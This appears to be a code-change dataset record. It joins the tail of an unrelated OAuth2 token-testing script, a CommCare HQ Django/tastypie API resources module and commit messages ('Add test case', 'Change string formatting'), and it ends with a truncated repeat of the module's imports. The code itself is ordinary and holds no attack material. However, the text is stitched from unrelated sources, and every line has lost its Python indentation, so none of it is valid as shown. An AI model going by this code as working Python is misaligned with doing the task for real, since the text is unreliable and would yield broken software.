print('Access Token: %s' % response['access_token'])
print('Access Token Expiration Seconds: %s' % response['expires_in'])
elif options.test_imap_authentication:
RequireOptions(options, 'user', 'access_token')
TestImapAuthentication(options.user,
GenerateOAuth2String(options.user, options.access_token,
base64_encode=False))
elif options.test_smtp_authentication:
RequireOptions(options, 'user', 'access_token')
TestSmtpAuthentication(options.user,
GenerateOAuth2String(options.user, options.access_token,
base64_encode=False))
else:
options_parser.print_help()
print('Nothing to do, exiting.')
return
if __name__ == '__main__':
main(sys.argv)
|
Add test case
|
import json
from collections import namedtuple
from django.conf.urls import re_path as url
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.urls import reverse
from django.utils.translation import gettext as _
from django.utils.translation import gettext_noop
from memoized import memoized_property
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import BadRequest, ImmediateHttpResponse, NotFound
from tastypie.http import HttpForbidden, HttpUnauthorized
from tastypie.resources import ModelResource, Resource, convert_post_to_patch
from tastypie.utils import dict_strip_unicode_keys
from phonelog.models import DeviceReportEntry
from corehq import privileges, toggles
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.api.cors import add_cors_headers_to_response
from corehq.apps.api.odata.serializers import (
ODataCaseSerializer,
ODataFormSerializer,
)
from corehq.apps.api.odata.utils import record_feed_access_in_datadog
from corehq.apps.api.odata.views import (
add_odata_headers,
raise_odata_permissions_issues,
)
from corehq.apps.api.resources.auth import (
AdminAuthentication,
LoginAuthentication,
ODataAuthentication,
RequirePermissionAuthentication,
)
from corehq.apps.api.resources.meta import CustomResourceMeta
from corehq.apps.api.resources.serializers import ListToSingleObjectSerializer
from corehq.apps.api.util import get_obj
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import Domain
from corehq.apps.es import UserES
from corehq.apps.export.esaccessors import (
get_case_export_base_query,
get_form_export_base_query,
)
from corehq.apps.export.models import CaseExportInstance, FormExportInstance
from corehq.apps.groups.models import Group
from corehq.apps.locations.permissions import location_safe
from corehq.apps.reports.analytics.esaccessors import (
get_case_types_for_domain_es,
)
from corehq.apps.reports.standard.cases.utils import (
query_location_restricted_cases,
query_location_restricted_forms,
)
from corehq.apps.userreports.columns import UCRExpandDatabaseSubcolumn
from corehq.apps.userreports.dbaccessors import get_datasources_for_domain
from corehq.apps.userreports.exceptions import BadSpecError
from corehq.apps.userreports.models import (
DataSourceConfiguration,
ReportConfiguration,
StaticReportConfiguration,
report_config_id_is_static,
)
from corehq.apps.userreports.reports.data_source import (
ConfigurableReportDataSource,
)
from corehq.apps.userreports.reports.view import (
get_filter_values,
query_dict_to_dict,
)
from corehq.apps.userreports.util import (
get_configurable_and_static_reports,
get_report_config_or_not_found,
)
from corehq.apps.users.dbaccessors import (
get_all_user_id_username_pairs_by_domain,
)
from corehq.apps.users.models import (
CommCareUser,
CouchUser,
Permissions,
UserRole,
WebUser,
)
from corehq.apps.users.util import raw_username
from corehq.const import USER_CHANGE_VIA_API
from corehq.util import get_document_or_404
from corehq.util.couch import DocumentNotFound
from corehq.util.timer import TimingContext
from . import (
CorsResourceMixin,
CouchResourceMixin,
DomainSpecificResourceMixin,
HqBaseResource,
v0_1,
v0_4,
)
from .pagination import DoesNothingPaginator, NoCountingPaginator
from ..exceptions import InvalidFormatException, InvalidFieldException, UpdateConflictException
from ..user_updates import update
MOCK_BULK_USER_ES = None
def user_es_call(domain, q, fields, size, start_at):
query = (UserES()
.domain(domain)
.fields(fields)
.size(size)
.start(start_at))
if q is not None:
query.set_query({"query_string": {"query": q}})
return query.run().hits
def _set_role_for_bundle(kwargs, bundle):
# check for roles associated with the domain
domain_roles = UserRole.objects.by_domain_and_name(kwargs['domain'], bundle.data.get('role'))
if domain_roles:
qualified_role_id = domain_roles[0].get_qualified_id() # roles may not be unique by name
bundle.obj.set_role(kwargs['domain'], qualified_role_id)
else:
raise BadRequest(f"Invalid User Role '{bundle.data.get('role')}'")
class BulkUserResource(HqBaseResource, DomainSpecificResourceMixin):
"""
A read-only user data resource based on elasticsearch.
Supported Params: limit offset q fields
"""
type = "bulk-user"
id = fields.CharField(attribute='id', readonly=True, unique=True)
email = fields.CharField(attribute='email')
username = fields.CharField(attribute='username', unique=True)
first_name = fields.CharField(attribute='first_name', null=True)
last_name = fields.CharField(attribute='last_name', null=True)
phone_numbers = fields.ListField(attribute='phone_numbers', null=True)
@staticmethod
def to_obj(user):
'''
Takes a flat dict and returns an object
'''
if '_id' in user:
user['id'] = user.pop('_id')
return namedtuple('user', list(user))(**user)
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.edit_commcare_users)
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
object_class = object
resource_name = 'bulk-user'
def dehydrate(self, bundle):
fields = bundle.request.GET.getlist('fields')
data = {}
if not fields:
return bundle
for field in fields:
data[field] = bundle.data[field]
bundle.data = data
return bundle
def obj_get_list(self, bundle, **kwargs):
request_fields = bundle.request.GET.getlist('fields')
for field in request_fields:
if field not in self.fields:
raise BadRequest('{0} is not a valid field'.format(field))
params = bundle.request.GET
param = lambda p: params.get(p, None)
fields = list(self.fields)
fields.remove('id')
fields.append('_id')
fn = MOCK_BULK_USER_ES or user_es_call
users = fn(
domain=kwargs['domain'],
q=param('q'),
fields=fields,
size=param('limit'),
start_at=param('offset'),
)
return list(map(self.to_obj, users))
def detail_uri_kwargs(self, bundle_or_obj):
return {
'pk': get_obj(bundle_or_obj).id
}
class CommCareUserResource(v0_1.CommCareUserResource):
class Meta(v0_1.CommCareUserResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict) and request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if bundle_or_obj is None:
return super(CommCareUserResource, self).get_resource_uri(bundle_or_obj, url_name)
elif isinstance(bundle_or_obj, Bundle):
obj = bundle_or_obj.obj
else:
obj = bundle_or_obj
return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
domain=obj.domain,
api_name=self._meta.api_name,
pk=obj._id))
def obj_create(self, bundle, **kwargs):
try:
bundle.obj = CommCareUser.create(
domain=kwargs['domain'],
username=bundle.data['username'].lower(),
password=bundle.data['password'],
created_by=bundle.request.couch_user,
created_via=USER_CHANGE_VIA_API,
email=bundle.data.get('email', '').lower(),
)
# password was just set
bundle.data.pop('password', None)
# do not call update with username key
bundle.data.pop('username', None)
self._update(bundle)
bundle.obj.save()
except Exception:
if bundle.obj._id:
bundle.obj.retire(bundle.request.domain, deleted_by=bundle.request.couch_user,
deleted_via=USER_CHANGE_VIA_API)
try:
django_user = bundle.obj.get_django_user()
except User.DoesNotExist:
pass
else:
django_user.delete()
raise
return bundle
def obj_update(self, bundle, **kwargs):
bundle.obj = CommCareUser.get(kwargs['pk'])
assert bundle.obj.domain == kwargs['domain']
user_change_logger = self._get_user_change_logger(bundle)
errors = self._update(bundle, user_change_logger)
if errors:
formatted_errors = ', '.join(errors)
raise BadRequest(_('The request resulted in the following errors: {}').format(formatted_errors))
assert bundle.obj.domain == kwargs['domain']
bundle.obj.save()
user_change_logger.save()
return bundle
def obj_delete(self, bundle, **kwargs):
user = CommCareUser.get(kwargs['pk'])
if user:
user.retire(bundle.request.domain, deleted_by=bundle.request.couch_user,
deleted_via=USER_CHANGE_VIA_API)
return ImmediateHttpResponse(response=http.HttpAccepted())
@classmethod
def _update(cls, bundle, user_change_logger=None):
errors = []
for key, value in bundle.data.items():
try:
update(bundle.obj, key, value, user_change_logger)
except InvalidFieldException as e:
errors.append(_("Attempted to update unknown or non-editable field '{}'").format(e.field))
except InvalidFormatException as e:
errors.append(_('{} must be a {}').format(e.field, e.expected_type))
except (UpdateConflictException, ValidationError) as e:
errors.append(e.message)
return errors
class WebUserResource(v0_1.WebUserResource):
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if isinstance(bundle_or_obj, Bundle):
domain = bundle_or_obj.request.domain
obj = bundle_or_obj.obj
elif bundle_or_obj is None:
return None
return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
domain=domain,
api_name=self._meta.api_name,
pk=obj._id))
class AdminWebUserResource(v0_1.UserResource):
domains = fields.ListField(attribute='domains')
def obj_get(self, bundle, **kwargs):
return WebUser.get(kwargs['pk'])
def obj_get_list(self, bundle, **kwargs):
if 'username' in bundle.request.GET:
return [WebUser.get_by_username(bundle.request.GET['username'])]
return [WebUser.wrap(u) for u in UserES().web_users().run().hits]
class Meta(WebUserResource.Meta):
authentication = AdminAuthentication()
detail_allowed_methods = ['get']
list_allowed_methods = ['get']
class GroupResource(v0_4.GroupResource):
class Meta(v0_4.GroupResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post', 'patch']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict):
if 'error_message' in data.data:
data = {'error_message': data.data['error_message']}
elif request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def patch_list(self, request=None, **kwargs):
"""
Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1466
(BSD licensed) and modified to pass the kwargs to `obj_create` and support only create method
"""
request = convert_post_to_patch(request)
deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
collection_name = self._meta.collection_name
if collection_name not in deserialized:
raise BadRequest("Invalid data sent: missing '%s'" % collection_name)
if len(deserialized[collection_name]) and 'put' not in self._meta.detail_allowed_methods:
raise ImmediateHttpResponse(response=http.HttpMethodNotAllowed())
bundles_seen = []
status = http.HttpAccepted
for data in deserialized[collection_name]:
data = self.alter_deserialized_detail_data(request, data)
bundle = self.build_bundle(data=dict_strip_unicode_keys(data), request=request)
try:
self.obj_create(bundle=bundle, **self.remove_api_resource_names(kwargs))
except AssertionError as e:
status = http.HttpBadRequest
bundle.data['_id'] = str(e)
bundles_seen.append(bundle)
to_be_serialized = [bundle.data['_id'] for bundle in bundles_seen]
return self.create_response(request, to_be_serialized, response_class=status)
def post_list(self, request, **kwargs):
"""
Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1314
(BSD licensed) and modified to catch Exception and not returning traceback
"""
deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
deserialized = self.alter_deserialized_detail_data(request, deserialized)
bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized), request=request)
try:
updated_bundle = self.obj_create(bundle, **self.remove_api_resource_names(kwargs))
location = self.get_resource_uri(updated_bundle)
if not self._meta.always_return_data:
return http.HttpCreated(location=location)
else:
updated_bundle = self.full_dehydrate(updated_bundle)
updated_bundle = self.alter_detail_data_to_serialize(request, updated_bundle)
return self.create_response(request, updated_bundle, response_class=http.HttpCreated, location=location)
except AssertionError as e:
bundle.data['error_message'] = str(e)
return self.create_response(request, bundle, response_class=http.HttpBadRequest)
def _update(self, bundle):
should_save = False
for key, value in bundle.data.items():
if key == 'name' and getattr(bundle.obj, key, None) != value:
if not Group.by_name(bundle.obj.domain, value):
setattr(bundle.obj, key, value or '')
should_save = True
else:
raise Exception("A group with this name already exists")
if key == 'users' and getattr(bundle.obj, key, None) != value:
users_to_add = set(value) - set(bundle.obj.users)
users_to_remove = set(bundle.obj.users) - set(value)
for user in users_to_add:
bundle.obj.add_user(user)
should_save = True
for user in users_to_remove:
bundle.obj.remove_user(user)
should_save = True
elif getattr(bundle.obj, key, None) != value:
setattr(bundle.obj, key, value)
should_save = True
return should_save
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if bundle_or_obj is None:
return super(GroupResource, self).get_resource_uri(bundle_or_obj, url_name)
elif isinstance(bundle_or_obj, Bundle):
obj = bundle_or_obj.obj
else:
obj = bundle_or_obj
return self._get_resource_uri(obj)
def _get_resource_uri(self, obj):
# This function is called up to 1000 times per request
# so build url from a known string template
# to avoid calling the expensive `reverse` function each time
return self._get_resource_uri_template.format(domain=obj.domain, pk=obj._id)
@memoized_property
def _get_resource_uri_template(self):
"""Returns the literal string "/a/{domain}/api/v0.5/group/{pk}/" in a DRY way"""
return reverse('api_dispatch_detail', kwargs=dict(
resource_name=self._meta.resource_name,
api_name=self._meta.api_name,
domain='__domain__',
pk='__pk__')).replace('__pk__', '{pk}').replace('__domain__', '{domain}')
def obj_create(self, bundle, request=None, **kwargs):
if not Group.by_name(kwargs['domain'], bundle.data.get("name")):
bundle.obj = Group(bundle.data)
bundle.obj.name = bundle.obj.name or ''
bundle.obj.domain = kwargs['domain']
bundle.obj.save()
for user in bundle.obj.users:
CommCareUser.get(user).set_groups([bundle.obj._id])
else:
raise AssertionError("A group with name %s already exists" % bundle.data.get("name"))
return bundle
def obj_update(self, bundle, **kwargs):
bundle.obj = Group.get(kwargs['pk'])
assert bundle.obj.domain == kwargs['domain']
if self._update(bundle):
assert bundle.obj.domain == kwargs['domain']
bundle.obj.save()
return bundle
def obj_delete(self, bundle, **kwargs):
group = self.obj_get(bundle, **kwargs)
group.soft_delete()
return bundle
class DomainAuthorization(ReadOnlyAuthorization):
def __init__(self, domain_key='domain', *args, **kwargs):
self.domain_key = domain_key
def read_list(self, object_list, bundle):
return object_list.filter(**{self.domain_key: bundle.request.domain})
class DeviceReportResource(HqBaseResource, ModelResource):
class Meta(object):
queryset = DeviceReportEntry.objects.all()
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'device-log'
authentication = RequirePermissionAuthentication(Permissions.edit_data)
authorization = DomainAuthorization()
paginator_class = NoCountingPaginator
filtering = {
# this is needed for the domain filtering but any values passed in via the URL get overridden
"domain": ('exact',),
"date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
"user_id": ('exact',),
"username": ('exact',),
"type": ('exact',),
"xform_id": ('exact',),
"device_id": ('exact',),
}
ConfigurableReportData = namedtuple("ConfigurableReportData", [
"data", "columns", "id", "domain", "total_records", "get_params", "next_page"
])
class ConfigurableReportDataResource(HqBaseResource, DomainSpecificResourceMixin):
"""
A resource that replicates the behavior of the ajax part of the
ConfigurableReportView view.
"""
data = fields.ListField(attribute="data", readonly=True)
columns = fields.ListField(attribute="columns", readonly=True)
total_records = fields.IntegerField(attribute="total_records", readonly=True)
next_page = fields.CharField(attribute="next_page", readonly=True)
LIMIT_DEFAULT = 50
LIMIT_MAX = 50
def _get_start_param(self, bundle):
try:
start = int(bundle.request.GET.get('offset', 0))
if start < 0:
raise ValueError
except (ValueError, TypeError):
raise BadRequest("start must be a positive integer.")
return start
def _get_limit_param(self, bundle):
try:
limit = int(bundle.request.GET.get('limit', self.LIMIT_DEFAULT))
if limit < 0:
raise ValueError
except (ValueError, TypeError):
raise BadRequest("limit must be a positive integer.")
if limit > self.LIMIT_MAX:
raise BadRequest("Limit may not exceed {}.".format(self.LIMIT_MAX))
return limit
def _get_next_page(self, domain, id_, start, limit, total_records, get_query_dict):
if total_records > start + limit:
start += limit
new_get_params = get_query_dict.copy()
new_get_params["offset"] = start
# limit has not changed, but it may not have been present in get params before.
new_get_params["limit"] = limit
return reverse('api_dispatch_detail', kwargs=dict(
api_name=self._meta.api_name,
resource_name=self._meta.resource_name,
domain=domain,
pk=id_,
)) + "?" + new_get_params.urlencode()
else:
return ""
def _get_report_data(self, report_config, domain, start, limit, get_params, couch_user):
report = ConfigurableReportDataSource.from_spec(report_config, include_prefilters=True)
string_type_params = [
filter.name
for filter in report_config.ui_filters
if getattr(filter, 'datatype', 'string') == "string"
]
filter_values = get_filter_values(
report_config.ui_filters,
query_dict_to_dict(get_params, domain, string_type_params),
couch_user,
)
report.set_filter_values(filter_values)
page = list(report.get_data(start=start, limit=limit))
columns = []
for column in report.columns:
simple_column = {
"header": column.header,
"slug": column.slug,
}
if isinstance(column, UCRExpandDatabaseSubcolumn):
simple_column['expand_column_value'] = column.expand_value
columns.append(simple_column)
total_records = report.get_total_records()
return page, columns, total_records
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
pk = kwargs['pk']
start = self._get_start_param(bundle)
limit = self._get_limit_param(bundle)
report_config = self._get_report_configuration(pk, domain)
page, columns, total_records = self._get_report_data(
report_config, domain, start, limit, bundle.request.GET, bundle.request.couch_user)
return ConfigurableReportData(
data=page,
columns=columns,
total_records=total_records,
id=report_config._id,
domain=domain,
get_params=bundle.request.GET,
next_page=self._get_next_page(
domain,
report_config._id,
start,
limit,
total_records,
bundle.request.GET,
)
)
def _get_report_configuration(self, id_, domain):
"""
Fetch the required ReportConfiguration object
:param id_: The id of the ReportConfiguration
:param domain: The domain of the ReportConfiguration
:return: A ReportConfiguration
"""
try:
if report_config_id_is_static(id_):
return StaticReportConfiguration.by_id(id_, domain=domain)
else:
return get_report_config_or_not_found(domain, id_)
except DocumentNotFound:
raise NotFound
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj).id,
}
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
uri = super(ConfigurableReportDataResource, self).get_resource_uri(bundle_or_obj, url_name)
if bundle_or_obj is not None and uri:
get_params = get_obj(bundle_or_obj).get_params.copy()
if "offset" not in get_params:
get_params["offset"] = 0
if "limit" not in get_params:
get_params["limit"] = self.LIMIT_DEFAULT
uri += "?{}".format(get_params.urlencode())
return uri
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.view_reports, allow_session_auth=True)
list_allowed_methods = []
detail_allowed_methods = ["get"]
class SimpleReportConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
id = fields.CharField(attribute='get_id', readonly=True, unique=True)
title = fields.CharField(readonly=True, attribute="title", null=True)
filters = fields.ListField(readonly=True)
columns = fields.ListField(readonly=True)
def dehydrate_filters(self, bundle):
obj_filters = bundle.obj.filters
return [{
"type": f["type"],
"datatype": f["datatype"],
"slug": f["slug"]
} for f in obj_filters]
def dehydrate_columns(self, bundle):
obj_columns = bundle.obj.columns
return [{
"column_id": c['column_id'],
"display": c['display'],
"type": c["type"],
} for c in obj_columns]
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
pk = kwargs['pk']
try:
report_configuration = get_document_or_404(ReportConfiguration, domain, pk)
except Http404 as e:
raise NotFound(str(e))
return report_configuration
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
return get_configurable_and_static_reports(domain)
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj)._id,
}
class Meta(CustomResourceMeta):
list_allowed_methods = ["get"]
detail_allowed_methods = ["get"]
paginator_class = DoesNothingPaginator
class DataSourceConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
"""
API resource for DataSourceConfigurations (UCR data sources)
"""
id = fields.CharField(attribute='get_id', readonly=True, unique=True)
display_name = fields.CharField(attribute="display_name", null=True)
configured_filter = fields.DictField(attribute="configured_filter", use_in='detail')
configured_indicators = fields.ListField(attribute="configured_indicators", use_in='detail')
def _ensure_toggle_enabled(self, request):
if not toggles.USER_CONFIGURABLE_REPORTS.enabled_for_request(request):
raise ImmediateHttpResponse(
add_cors_headers_to_response(
HttpResponse(
json.dumps({"error": _("You don't have permission to access this API")}),
content_type="application/json",
status=401,
)
)
)
def obj_get(self, bundle, **kwargs):
self._ensure_toggle_enabled(bundle.request)
domain = kwargs['domain']
pk = kwargs['pk']
try:
data_source = get_document_or_404(DataSourceConfiguration, domain, pk)
except Http404 as e:
raise NotFound(str(e))
return data_source
def obj_get_list(self, bundle, **kwargs):
self._ensure_toggle_enabled(bundle.request)
domain = kwargs['domain']
return get_datasources_for_domain(domain)
def obj_update(self, bundle, **kwargs):
self._ensure_toggle_enabled(bundle.request)
domain = kwargs['domain']
pk = kwargs['pk']
try:
data_source = get_document_or_404(DataSourceConfiguration, domain, pk)
except Http404 as e:
raise NotFound(str(e))
allowed_update_fields = [
'display_name',
'configured_filter',
'configured_indicators',
]
for key, value in bundle.data.items():
if key in allowed_update_fields:
data_source[key] = value
try:
data_source.validate()
data_source.save()
except BadSpecError as e:
raise ImmediateHttpResponse(
add_cors_headers_to_response(
HttpResponse(
json.dumps({"error": _("Invalid data source! Details: {details}").format(details=str(e))}),
content_type="application/json",
status=500,
)
)
)
bundle.obj = data_source
return bundle
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj)._id,
}
class Meta(CustomResourceMeta):
resource_name = 'ucr_data_source'
list_allowed_methods = ['get']
detail_allowed_methods = ['get', 'put']
always_return_data = True
paginator_class = DoesNothingPaginator
authentication = RequirePermissionAuthentication(Permissions.edit_ucrs)
UserDomain = namedtuple('UserDomain', 'domain_name project_name')
UserDomain.__new__.__defaults__ = ('', '')
class UserDomainsResource(CorsResourceMixin, Resource):
domain_name = fields.CharField(attribute='domain_name')
project_name = fields.CharField(attribute='project_name')
class Meta(object):
resource_name = 'user_domains'
authentication = LoginAuthentication(allow_session_auth=True)
object_class = UserDomain
include_resource_uri = False
def dispatch_list(self, request, **kwargs):
try:
return super(UserDomainsResource, self).dispatch_list(request, **kwargs)
except ImmediateHttpResponse as immediate_http_response:
if isinstance(immediate_http_response.response, HttpUnauthorized):
raise ImmediateHttpResponse(
response=HttpUnauthorized(
content='Username or API Key is incorrect', content_type='text/plain'
)
)
else:
raise
def obj_get_list(self, bundle, **kwargs):
feature_flag = bundle.request.GET.get("feature_flag")
if feature_flag and feature_flag not in toggles.all_toggles_slug():
raise BadRequest("{} is not a valid feature flag".format(feature_flag))
return self.get_object_list(bundle.request, feature_flag)
def get_object_list(self, request, feature_flag=None):
couch_user = CouchUser.from_django_user(request.user)
results = []
for domain in couch_user.get_domains():
if not domain_has_privilege(domain, privileges.ZAPIER_INTEGRATION):
continue
domain_object = Domain.get_by_name(domain)
if feature_flag and feature_flag not in toggles.toggles_dict(domain=domain):
continue
results.append(UserDomain(
domain_name=domain_object.name,
project_name=domain_object.hr_name or domain_object.name
))
return results
class IdentityResource(CorsResourceMixin, Resource):
id = fields.CharField(attribute='get_id', readonly=True)
username = fields.CharField(attribute='username', readonly=True)
first_name = fields.CharField(attribute='first_name', readonly=True)
last_name = fields.CharField(attribute='last_name', readonly=True)
email = fields.CharField(attribute='email', readonly=True)
def obj_get_list(self, bundle, **kwargs):
return [bundle.request.couch_user]
class Meta(object):
resource_name = 'identity'
authentication = LoginAuthentication()
serializer = ListToSingleObjectSerializer()
detail_allowed_methods = []
list_allowed_methods = ['get']
object_class = CouchUser
include_resource_uri = False
Form = namedtuple('Form', 'form_xmlns form_name')
Form.__new__.__defaults__ = ('', '')
class DomainForms(Resource):
"""
Returns: list of forms for a given domain with form name formatted for display in Zapier
"""
form_xmlns = fields.CharField(attribute='form_xmlns')
form_name = fields.CharField(attribute='form_name')
class Meta(object):
resource_name = 'domain_forms'
authentication = RequirePermissionAuthentication(Permissions.access_api)
object_class = Form
include_resource_uri = False
allowed_methods = ['get']
limit = 200
max_limit = 1000
def obj_get_list(self, bundle, **kwargs):
application_id = bundle.request.GET.get('application_id')
if not application_id:
raise NotFound('application_id parameter required')
results = []
application = Application.get(docid=application_id)
if not application:
return []
forms_objects = application.get_forms(bare=False)
for form_object in forms_objects:
form = form_object['form']
module = form_object['module']
form_name = '{} > {} > {}'.format(application.name, module.default_name(), form.default_name())
results.append(Form(form_xmlns=form.xmlns, form_name=form_name))
return results
# Zapier requires id and name; case_type has no obvious id, placeholder inserted instead.
CaseType = namedtuple('CaseType', 'case_type placeholder')
CaseType.__new__.__defaults__ = ('', '')
class DomainCases(Resource):
"""
Returns: list of case types for a domain
Note: only returns case types for which at least one case has been made
"""
placeholder = fields.CharField(attribute='placeholder')
case_type = fields.CharField(attribute='case_type')
class Meta(object):
resource_name = 'domain_cases'
authentication = RequirePermissionAuthentication(Permissions.access_api)
object_class = CaseType
include_resource_uri = False
allowed_methods = ['get']
limit = 100
max_limit = 1000
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
case_types = get_case_types_for_domain_es(domain)
results = [CaseType(case_type=case_type) for case_type in case_types]
return results
UserInfo = namedtuple('UserInfo', 'user_id user_name')
UserInfo.__new__.__defaults__ = ('', '')
class DomainUsernames(Resource):
"""
Returns: list of usernames for a domain.
"""
user_id = fields.CharField(attribute='user_id')
user_name = fields.CharField(attribute='user_name')
class Meta(object):
resource_name = 'domain_usernames'
authentication = RequirePermissionAuthentication(Permissions.view_commcare_users)
object_class = User
include_resource_uri = False
allowed_methods = ['get']
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
user_ids_username_pairs = get_all_user_id_username_pairs_by_domain(domain)
results = [UserInfo(user_id=user_pair[0], user_name=raw_username(user_pair[1]))
for user_pair in user_ids_username_pairs]
return results
class BaseODataResource(HqBaseResource, DomainSpecificResourceMixin):
config_id = None
table_id = None
def dispatch(self, request_type, request, **kwargs):
if not domain_has_privilege(request.domain, privileges.ODATA_FEED):
raise ImmediateHttpResponse(
response=HttpResponseNotFound('Feature flag not enabled.')
)
self.config_id = kwargs['config_id']
self.table_id = int(kwargs.get('table_id', 0))
with TimingContext() as timer:
response = super(BaseODataResource, self).dispatch(
request_type, request, **kwargs
)
record_feed_access_in_datadog(request, self.config_id, timer.duration, response)
return response
def create_response(self, request, data, response_class=HttpResponse,
**response_kwargs):
data['domain'] = request.domain
data['config_id'] = self.config_id
data['api_path'] = request.path
data['table_id'] = self.table_id
response = super(BaseODataResource, self).create_response(
request, data, response_class, **response_kwargs)
return add_odata_headers(response)
def detail_uri_kwargs(self, bundle_or_obj):
# Not sure why this is required but the feed 500s without it
return {
'pk': get_obj(bundle_or_obj)['_id']
}
def determine_format(self, request):
# Results should be sent as JSON
return 'application/json'
@location_safe
class ODataCaseResource(BaseODataResource):
def obj_get_list(self, bundle, domain, **kwargs):
config = get_document_or_404(CaseExportInstance, domain, self.config_id)
if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
raise ImmediateHttpResponse(
HttpForbidden(gettext_noop(
"You do not have permission to view this feed."
))
)
query = get_case_export_base_query(domain, config.case_type)
for filter in config.get_filters():
query = query.filter(filter.to_es_filter())
if not bundle.request.couch_user.has_permission(
domain, 'access_all_locations'
):
query = query_location_restricted_cases(query, bundle.request)
return query
class Meta(v0_4.CommCareCaseResource.Meta):
authentication = ODataAuthentication()
resource_name = 'odata/cases'
serializer = ODataCaseSerializer()
limit = 2000
max_limit = 10000
def prepend_urls(self):
return [
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
]
@location_safe
class ODataFormResource(BaseODataResource):
def obj_get_list(self, bundle, domain, **kwargs):
config = get_document_or_404(FormExportInstance, domain, self.config_id)
if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
raise ImmediateHttpResponse(
HttpForbidden(gettext_noop(
"You do not have permission to view this feed."
))
)
query = get_form_export_base_query(domain, config.app_id, config.xmlns, include_errors=False)
for filter in config.get_filters():
query = query.filter(filter.to_es_filter())
if not bundle.request.couch_user.has_permission(
domain, 'access_all_locations'
):
query = query_location_restricted_forms(query, bundle.request)
return query
class Meta(v0_4.XFormInstanceResource.Meta):
authentication = ODataAuthentication()
resource_name = 'odata/forms'
serializer = ODataFormSerializer()
limit = 2000
max_limit = 10000
def prepend_urls(self):
return [
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
]
Change string formatting
import json
from collections import namedtuple
from django.conf.urls import re_path as url
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.urls import reverse
from django.utils.translation import gettext as _
from django.utils.translation import gettext_noop
from memoized import memoized_property
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import BadRequest, ImmediateHttpResponse, NotFound
from tastypie.http import HttpForbidden, HttpUnauthorized
from tastypie.resources import ModelResource, Resource, convert_post_to_patch
from tastypie.utils import dict_strip_unicode_keys
from phonelog.models import DeviceReportEntry
from corehq import privileges, toggles
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.api.cors import add_cors_headers_to_response
from corehq.apps.api.odata.serializers import (
ODataCaseSerializer,
ODataFormSerializer,
)
from corehq.apps.api.odata.utils import record_feed_access_in_datadog
from corehq.apps.api.odata.views import (
add_odata_headers,
raise_odata_permissions_issues,
)
from corehq.apps.api.resources.auth import (
AdminAuthentication,
LoginAuthentication,
ODataAuthentication,
RequirePermissionAuthentication,
)
from corehq.apps.api.resources.meta import CustomResourceMeta
from corehq.apps.api.resources.serializers import ListToSingleObjectSerializer
from corehq.apps.api.util import get_obj
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import Domain
from corehq.apps.es import UserES
from corehq.apps.export.esaccessors import (
get_case_export_base_query,
get_form_export_base_query,
)
from corehq.apps.export.models import CaseExportInstance, FormExportInstance
from corehq.apps.groups.models import Group
